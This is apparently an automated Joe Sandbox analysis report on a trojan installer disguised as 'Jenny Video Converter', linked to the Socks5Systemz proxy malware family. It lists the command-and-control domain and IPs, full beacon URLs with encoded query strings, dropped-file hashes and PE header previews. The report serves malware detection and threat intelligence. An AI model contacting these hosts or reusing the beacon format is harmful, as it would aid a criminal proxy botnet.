        C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp3%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        csnzndu.net
        185.208.158.248
        truetrue
          unknown
          time.windows.com
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            csnzndu.nettrue
              unknown
              http://csnzndu.net/search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317true
                unknown
                http://csnzndu.net/search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f771ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c0ef919f3atrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.innosetup.com/ZFllSoXpoT.tmp, ZFllSoXpoT.tmp, 00000003.00000000.1311659479.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-GTTMJ.tmp.3.dr, ZFllSoXpoT.tmp.0.drfalse
                  • URL Reputation: safe
                  unknown
                  http://tukaani.org/is-K6ASR.tmp.3.drfalse
                    unknown
                    http://www.remobjects.com/psUZFllSoXpoT.exe, 00000000.00000003.1311021489.0000000002114000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310859620.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000000.1311659479.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-GTTMJ.tmp.3.dr, ZFllSoXpoT.tmp.0.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tukaani.org/xz/is-K6ASR.tmp.3.drfalse
                      unknown
                      http://mingw-w64.sourceforge.net/Xis-QGIC5.tmp.3.drfalse
                        unknown
                        http://185.208.158.248/search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928jennyvideoconverter32.exe, 00000008.00000002.2565587924.000000000339D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://185.208.158.248/search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82djennyvideoconverter32.exe, 00000008.00000002.2562237741.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://www.remobjects.com/psZFllSoXpoT.exe, 00000000.00000003.1311021489.0000000002114000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310859620.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, ZFllSoXpoT.tmp, 00000003.00000000.1311659479.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-GTTMJ.tmp.3.dr, ZFllSoXpoT.tmp.0.drfalse
                            • URL Reputation: safe
                            unknown
                            http://fsf.org/ZFllSoXpoT.exe, 00000000.00000002.2562216225.0000000002108000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310429003.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2562332360.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1314857869.0000000002148000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2563242691.0000000002140000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313032866.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320110050.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313145349.0000000002150000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320264697.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://standards.iso.org/iso/19770/-2/2009/schema.xsdsvchost.exe, 00000007.00000002.2561939603.0000020A1D087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2562809603.0000020A1D902000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.7.drfalse
                                unknown
                                http://www.gnu.org/licenses/ZFllSoXpoT.exe, 00000000.00000002.2562216225.0000000002108000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310429003.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2562332360.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1314857869.0000000002148000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2563242691.0000000002140000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313032866.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320110050.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313145349.0000000002150000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320264697.0000000000822000.00000004.00000020.00020000.00000000.sdmp, is-89P6A.tmp.3.drfalse
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.208.158.248
                                  csnzndu.netSwitzerland
                                  34888SIMPLECARRER2ITtrue
                                  89.105.201.183
                                  unknownNetherlands
                                  24875NOVOSERVE-ASNLfalse
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1527966
                                  Start date and time:2024-10-07 13:25:24 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 48s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:15
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:ZFllSoXpoT.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:d4d88602d5675d2a3da77ca8ac8f3293.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@14/71@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 92%
                                  • Number of executed functions: 188
                                  • Number of non-executed functions: 249
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 13.95.65.251
                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: ZFllSoXpoT.exe
                                  TimeTypeDescription
                                  09:14:05API Interceptor219218x Sleep call for process: jennyvideoconverter32.exe modified
                                  09:14:30API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.208.158.248OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                    Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                      ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                        AyiNxJ98mL.exeGet hashmaliciousSocks5SystemzBrowse
                                          0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                            2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                              Dw0MqzrLWq.exeGet hashmaliciousSocks5SystemzBrowse
                                                noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                  eCh9R4T214.exeGet hashmaliciousSocks5SystemzBrowse
                                                    noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                      89.105.201.183cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 200
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      NOVOSERVE-ASNLOTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      okkWFXQP0G.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      xW98tuRe0i.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      AyiNxJ98mL.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      pTQN2MIbjQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 89.105.201.183
                                                      SIMPLECARRER2ITfHeDaDg5FQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.196.8.214
                                                      OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.208.158.248
                                                      Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.208.158.248
                                                      ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.208.158.248
                                                      SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.196.8.214
                                                      sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.196.8.214
                                                      okkWFXQP0G.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.196.8.214
                                                      xW98tuRe0i.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.196.8.214
                                                      AyiNxJ98mL.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.208.158.248
                                                      pTQN2MIbjQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 185.196.8.214
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Jenny Video Converter\is-1GTV3.tmpfHeDaDg5FQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                        OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                          Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                            ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                              SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                                sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  okkWFXQP0G.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    xW98tuRe0i.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      AyiNxJ98mL.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        pTQN2MIbjQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3350528
                                                                          Entropy (8bit):6.821929822065726
                                                                          Encrypted:false
                                                                          SSDEEP:49152:Wr+VKAS5TuRH0xK+i1HOs5G81i8DUJVKQ28g/:Wi8TiHgKbx73oL28g
                                                                          MD5:5C125A0FB6A9C14E6767045117CEBEC4
                                                                          SHA1:4C1B9B4CDF7F2B71F655200AD147D0E69530DED8
                                                                          SHA-256:8F22A15296C83ABB06C8A020CB4D907012B6108FF7BC5074673CBC4D4339125E
                                                                          SHA-512:01E8763FA771DACC5600C709579CD16E4592587DBBCFD47E1149C5B26646D2012AE1869AF2E2C164DB6B65D3C9E4F70DA0C936FD43351A71035CD427E3472DCA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....}.L.................."..........z"......."...@...........................3.....p"3.....................................D.".......#...............................................................................".d............................text.....".......".................`....rdata...(...."..*....".............@..@_cde_3..8.....#..0....".............@....rsrc.........#.......#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:3l:V
                                                                          MD5:63B568167F1493B3CC8C1DB2E9020CD2
                                                                          SHA1:6AD58824EC391200C9D77155B80F90C3019278BB
                                                                          SHA-256:6FA1890C1B43AA548E224F2EE50194CE64F1D242F56B64A9077FFABB4DCD1681
                                                                          SHA-512:DAE4C4F1CCFBA8461C70E36D8ECBF22D008A4A7128A9807F5E5812B444CEA537B942466C133A9D7A3F54831A33A8F9E31D13B73C84F50AEFA59951173DCCBC8F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...g....
                                                                          Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:9ln:H
                                                                          MD5:A5DEC7CED94C03147F8E18C9A7BCF089
                                                                          SHA1:8022FBFA32B90F0769EAD98E38E6EF8C3B423175
                                                                          SHA-256:29374CFDD45D8433713BB3252954E48841401C4EE254A651CFFFD2287F5360DE
                                                                          SHA-512:71DEB139D256718990C80FACCB244CC367A7DF1B07A90A664C439AEAB98E7C6CB8E532A0D6D415B793F12F78A8FF3326871B6B8E4C14E88FCABDF06B0631650D
                                                                          Malicious:false
                                                                          Preview:P...
                                                                          Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):128
                                                                          Entropy (8bit):2.9545817380615236
                                                                          Encrypted:false
                                                                          SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                          MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                          SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                          SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                          SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                          Malicious:false
                                                                          Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                          Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):128
                                                                          Entropy (8bit):1.7095628900165245
                                                                          Encrypted:false
                                                                          SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                          MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                          SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                          SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                          SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                          Malicious:false
                                                                          Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):999
                                                                          Entropy (8bit):4.966299883488245
                                                                          Encrypted:false
                                                                          SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                          MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                          SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                          SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                          SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                          Malicious:false
                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):268404
                                                                          Entropy (8bit):6.265024248848175
                                                                          Encrypted:false
                                                                          SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                          MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                          SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                          SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                          SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: fHeDaDg5FQ.exe, Detection: malicious, Browse
                                                                          • Filename: OTC71Ny3Ta.exe, Detection: malicious, Browse
                                                                          • Filename: Ui6sm6N5JG.exe, Detection: malicious, Browse
                                                                          • Filename: ITJ8wVQL5s.exe, Detection: malicious, Browse
                                                                          • Filename: SQE6u2kmJL.exe, Detection: malicious, Browse
                                                                          • Filename: sl9B1ty1iL.exe, Detection: malicious, Browse
                                                                          • Filename: okkWFXQP0G.exe, Detection: malicious, Browse
                                                                          • Filename: xW98tuRe0i.exe, Detection: malicious, Browse
                                                                          • Filename: AyiNxJ98mL.exe, Detection: malicious, Browse
                                                                          • Filename: pTQN2MIbjQ.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):448557
                                                                          Entropy (8bit):6.353356595345232
                                                                          Encrypted:false
                                                                          SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                          MD5:908111F583B7019D2ED3492435E5092D
                                                                          SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                          SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                          SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):509934
                                                                          Entropy (8bit):6.031080686301204
                                                                          Encrypted:false
                                                                          SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                          MD5:02E6C6AB886700E6F184EEE43157C066
                                                                          SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                          SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                          SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):92019
                                                                          Entropy (8bit):5.974787373427489
                                                                          Encrypted:false
                                                                          SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                          MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                          SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                          SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                          SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3350528
                                                                          Entropy (8bit):6.82192980502819
                                                                          Encrypted:false
                                                                          SSDEEP:49152:tr+VKAS5TuRH0xK+i1HOs5G81i8DUJVKQ28g/:ti8TiHgKbx73oL28g
                                                                          MD5:C6607FDB48EF0E252FE0CB0F4A8318EE
                                                                          SHA1:09EE29E28469FB635677CDAAA2B9954787D95B1F
                                                                          SHA-256:20350FAE2481F3F9A58F1D67AC3D54799C409E374FC85232873054CDFC65DF4B
                                                                          SHA-512:5684E582932AB0CF74D598A653B7597686D52776577E72124E1BE52BDFB7567A986271D1C480948AD000161E8A410496DF5A2C55751A2F028A793D5BA72F53BF
                                                                          Malicious:false
                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....}.L.................."..........z"......."...@...........................3.....p"3.....................................D.".......#...............................................................................".d............................text.....".......".................`....rdata...(...."..*....".............@..@_cde_3..8.....#..0....".............@....rsrc.........#.......#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):248694
                                                                          Entropy (8bit):6.346971642353424
                                                                          Encrypted:false
                                                                          SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                          MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                          SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                          SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                          SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):26562
                                                                          Entropy (8bit):5.606958768500933
                                                                          Encrypted:false
                                                                          SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                          MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                          SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                          SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                          SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
